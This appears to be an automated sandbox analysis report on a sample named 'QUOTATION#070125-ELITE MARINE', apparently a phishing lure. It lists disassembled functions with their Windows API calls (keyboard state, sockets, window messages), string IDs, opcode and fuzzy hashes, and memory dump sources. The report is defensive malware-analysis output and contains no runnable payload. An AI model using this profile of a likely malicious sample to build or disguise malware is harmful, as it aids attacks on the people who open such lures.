                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 0$2
                                                                            • API String ID: 93392585-3793063076
                                                                            • Opcode ID: 87ec12e5702a6f4ec70cb599bf58effc5d61e6cd77bba364642ce00953c4da23
                                                                            • Instruction ID: f240e8da2822943e0bc72f14a61f24361273d8c824ce697f14e3e17f950b9ebc
                                                                            • Opcode Fuzzy Hash: 87ec12e5702a6f4ec70cb599bf58effc5d61e6cd77bba364642ce00953c4da23
                                                                            • Instruction Fuzzy Hash: 5051AD70A002099BDF10CFA8EA88BEEBBFEAF45324F146159E405A7790D7709949CB61
                                                                            Function 0069C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0069C913
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 0da13534c9e45fb7a4d2f6376dbb4a36e91d59e441ba54ea0c4e45ec25a1d377
                                                                            • Instruction ID: b9de1cb482d869692ae94ddd2d5c718324ecc556be74e0df7b7544559a28aebc
                                                                            • Opcode Fuzzy Hash: 0da13534c9e45fb7a4d2f6376dbb4a36e91d59e441ba54ea0c4e45ec25a1d377
                                                                            • Instruction Fuzzy Hash: AA110D3168D30ABAEF056B55DC83CFA779EDF15379B20002EF904A6682DB705D415368
                                                                            Function 006C9F86 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 006C9FC7
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 006C9FE7
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006CA224
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006CA242
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006CA263
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 006CA282
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 006CA2A7
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 006CA2CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 6b4e0b4474892f7c7c89cd98d0a8dafd810398ff25992451f73b34cf367091ed
                                                                            • Instruction ID: f9bebb533f3e5b7a6974850dec07c5d6a1e1f123d38c6484f24dfe1a7ac39410
                                                                            • Opcode Fuzzy Hash: 6b4e0b4474892f7c7c89cd98d0a8dafd810398ff25992451f73b34cf367091ed
                                                                            • Instruction Fuzzy Hash: 15B18931600229DBDF14CFA8C989BFA7BB2FF44715F088169EC499B295D735AA40CB61
                                                                            Function 0064F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0064F953
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0068F3D1
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0068F454
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: f752b948b5f0a7d363791f69fb70008c58e75927954bb2bc6ddec018ef91e1cc
                                                                            • Instruction ID: abd0a3b6dc99e454293448b08fc25e6400fb6f8b56cfe21c1a5da34b5612c567
                                                                            • Opcode Fuzzy Hash: f752b948b5f0a7d363791f69fb70008c58e75927954bb2bc6ddec018ef91e1cc
                                                                            • Instruction Fuzzy Hash: 1A411831618680FFD7399F298888BBA7BD3AF56324F18553DF08B56761C732A881CB51
                                                                            Function 006C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 006C2D1B
                                                                            • GetDC.USER32(00000000), ref: 006C2D23
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006C2D2E
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 006C2D3A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006C2D76
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006C2D87
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 006C2DC2
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006C2DE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 7f3a60a584ee969e569eb97cde8590baa53adab3ff5313f5d043aeb0ab39e46c
                                                                            • Instruction ID: c67d87e1f323b139a633731e6526b666f13d443d98f5f682196e4add910d8408
                                                                            • Opcode Fuzzy Hash: 7f3a60a584ee969e569eb97cde8590baa53adab3ff5313f5d043aeb0ab39e46c
                                                                            • Instruction Fuzzy Hash: E3319C72201214BFEB118F50CC8AFFB3BAAEF19721F084055FE099A291C6759C41CBA4
                                                                            Function 006B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 2ac016838edbe968133b701c8bcf1379a435e091ad116ecaf93b286dd3b75fda
                                                                            • Instruction ID: 985d988988ad5b51c8869cc1df8afe3048e5c1780ea906f79f173cc0fc23c9b2
                                                                            • Opcode Fuzzy Hash: 2ac016838edbe968133b701c8bcf1379a435e091ad116ecaf93b286dd3b75fda
                                                                            • Instruction Fuzzy Hash: 91D19FB1A0060A9FDF14DF98C881BEEB7B6BF48354F148069E916AB381E771DD85CB50
                                                                            Function 00668D45 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 300COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .e
                                                                            • API String ID: 0-2491337497
                                                                            • Opcode ID: ec6363349a0c34fa68f0190584cc882fc0bb761c3d5069ab2c313c72d16dea80
                                                                            • Instruction ID: 3bd2fac480c31893b367b5fec667486647f63aa87dc0e4ee0aae947277e174a9
                                                                            • Opcode Fuzzy Hash: ec6363349a0c34fa68f0190584cc882fc0bb761c3d5069ab2c313c72d16dea80
                                                                            • Instruction Fuzzy Hash: 69C1D1B4A04249EFDF11DFA8D841BEDBBB6AF09310F14429DE815A7392CB349942CB75
                                                                            Function 006B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2610073882-625585964
                                                                            • Opcode ID: 683db78ac6c50c49e6bd31355d940bece0a78e3df1aece5e51da2f92dc2a15d3
                                                                            • Instruction ID: 0baaa058638b39449a84328d5db74abd84df8d007de2deb04f3f6b0095e26203
                                                                            • Opcode Fuzzy Hash: 683db78ac6c50c49e6bd31355d940bece0a78e3df1aece5e51da2f92dc2a15d3
                                                                            • Instruction Fuzzy Hash: FF9176B1A00215ABDF24CF65C844FEE7BBAEF46714F10855DF505AB282DB709985CF90
                                                                            Function 006A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 006A125C
                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 006A1284
                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006A12A8
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A12D8
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A135F
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A13C4
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A1430
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                            • String ID:
                                                                            • API String ID: 2550207440-0
                                                                            • Opcode ID: 56d18bcad83d5cd64f5618a7808a897077e2a0884851133810e9141672c8638c
                                                                            • Instruction ID: 2f64bcce522382f5a283911503e7aeda328f69d08be59daed31a6d1538200821
                                                                            • Opcode Fuzzy Hash: 56d18bcad83d5cd64f5618a7808a897077e2a0884851133810e9141672c8638c
                                                                            • Instruction Fuzzy Hash: 75919E719002099FDB40AF98C885BBEB7F6FF46325F148029E541EB291D774AD41CF94
                                                                            Function 0064948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 2e6ce1df52bf2cf5c50c18e9b8ba03639b864dc5da700e45673e3ae0d0734811
                                                                            • Instruction ID: 27c0d4f6a45310135206db172cec6607e05003279b23f5d713897712e47c2924
                                                                            • Opcode Fuzzy Hash: 2e6ce1df52bf2cf5c50c18e9b8ba03639b864dc5da700e45673e3ae0d0734811
                                                                            • Instruction Fuzzy Hash: C4912671D40219EFCB14CFA9CC84AEEBBBAFF49320F248159E515B7251D375AA42CB60
                                                                            Function 006C7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00DC9D08), ref: 006C7F37
                                                                            • IsWindowEnabled.USER32(00DC9D08), ref: 006C7F43
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006C801E
                                                                            • SendMessageW.USER32(00DC9D08,000000B0,?,?), ref: 006C8051
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 006C8089
                                                                            • GetWindowLongW.USER32(00DC9D08,000000EC), ref: 006C80AB
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006C80C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: 3e6b7cd7ae394655172ebed7779be348bae8a453053b7300ddeaebc804cda4ee
                                                                            • Instruction ID: 77d0f1704886c4a2880c1090578c6a2c25656844ab7acde5f2426ff526f78143
                                                                            • Opcode Fuzzy Hash: 3e6b7cd7ae394655172ebed7779be348bae8a453053b7300ddeaebc804cda4ee
                                                                            • Instruction Fuzzy Hash: D8717774608244AFEB219F64C8D4FFABBBAEF09340F14409DE965973A1CB31A845DF60
                                                                            Function 0069AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0069AEF9
                                                                            • GetKeyboardState.USER32(?), ref: 0069AF0E
                                                                            • SetKeyboardState.USER32(?), ref: 0069AF6F
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0069AF9D
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0069AFBC
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0069AFFD
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0069B020
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: f01172435494d1d9c52be9113ce2a7c0e960c72cd347995cc4f0cd3225d9fc05
                                                                            • Instruction ID: 1a58bc9beb5a705c7a9de6a29e2fc8b0607954c56b41e211fd6c9f0b98e824c3
                                                                            • Opcode Fuzzy Hash: f01172435494d1d9c52be9113ce2a7c0e960c72cd347995cc4f0cd3225d9fc05
                                                                            • Instruction Fuzzy Hash: 4651DFA0A047D53DFF3683748D49BFABEEE5B06304F089589E1D985DC2C398A8C8D791
                                                                            Function 0069ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 0069AD19
                                                                            • GetKeyboardState.USER32(?), ref: 0069AD2E
                                                                            • SetKeyboardState.USER32(?), ref: 0069AD8F
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0069ADBB
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0069ADD8
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0069AE17
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0069AE38
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 3d44e88c053cfbaf5f47588f24bb6a4b64166cac5ac40b14cd2b0a5ad55d2b14
                                                                            • Instruction ID: a8cf5443ea220622814dbb3e948f9a14d31fc91173ca60c3128664f46ee4cda6
                                                                            • Opcode Fuzzy Hash: 3d44e88c053cfbaf5f47588f24bb6a4b64166cac5ac40b14cd2b0a5ad55d2b14
                                                                            • Instruction Fuzzy Hash: 0C51E5B05047D13DFF3683A48C45BBA7EEE5F46300F088488E1D546DC2C294EC88E792
                                                                            Function 006C3886 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006C3925
                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 006C393A
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006C3954
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 006C39C6
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006C39F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysListView32
                                                                            • API String ID: 2326795674-78025650
                                                                            • Opcode ID: c8644630e600642d4be5bf2d13071a3978df967e303d531e590e30a045d8a5bb
                                                                            • Instruction ID: 97794cceba19afc483ccd339241fed0a5ba08ea9f099e4d8956b0745e2e149a1
                                                                            • Opcode Fuzzy Hash: c8644630e600642d4be5bf2d13071a3978df967e303d531e590e30a045d8a5bb
                                                                            • Instruction Fuzzy Hash: 1D41A371A00219ABDF219F64CC45FFA7BAAEF08354F10452AF958E7381D775DA80CB90
                                                                            Function 006B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006B1112
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1121
                                                                            • WSAGetLastError.WSOCK32 ref: 006B11C9
                                                                            • closesocket.WSOCK32(00000000), ref: 006B11F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 3854663608-0
                                                                            • Opcode ID: 076cb180292e099519fd402c0ca5df0542a60f64c4738d6f7d73b570541e621c
                                                                            • Instruction ID: 4aa907dc407fb77d828356900631aa0b987e8706b622180b3e8e46318760206a
                                                                            • Opcode Fuzzy Hash: 076cb180292e099519fd402c0ca5df0542a60f64c4738d6f7d73b570541e621c
                                                                            • Instruction Fuzzy Hash: C341D475600214AFDB109F18C894BEABBEBEF46364F548059F9199F391C770AD81CBE1
                                                                            Function 006C2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006C2E1C
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2E4F
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2E84
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006C2EB6
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006C2EE0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2EF1
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006C2F0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
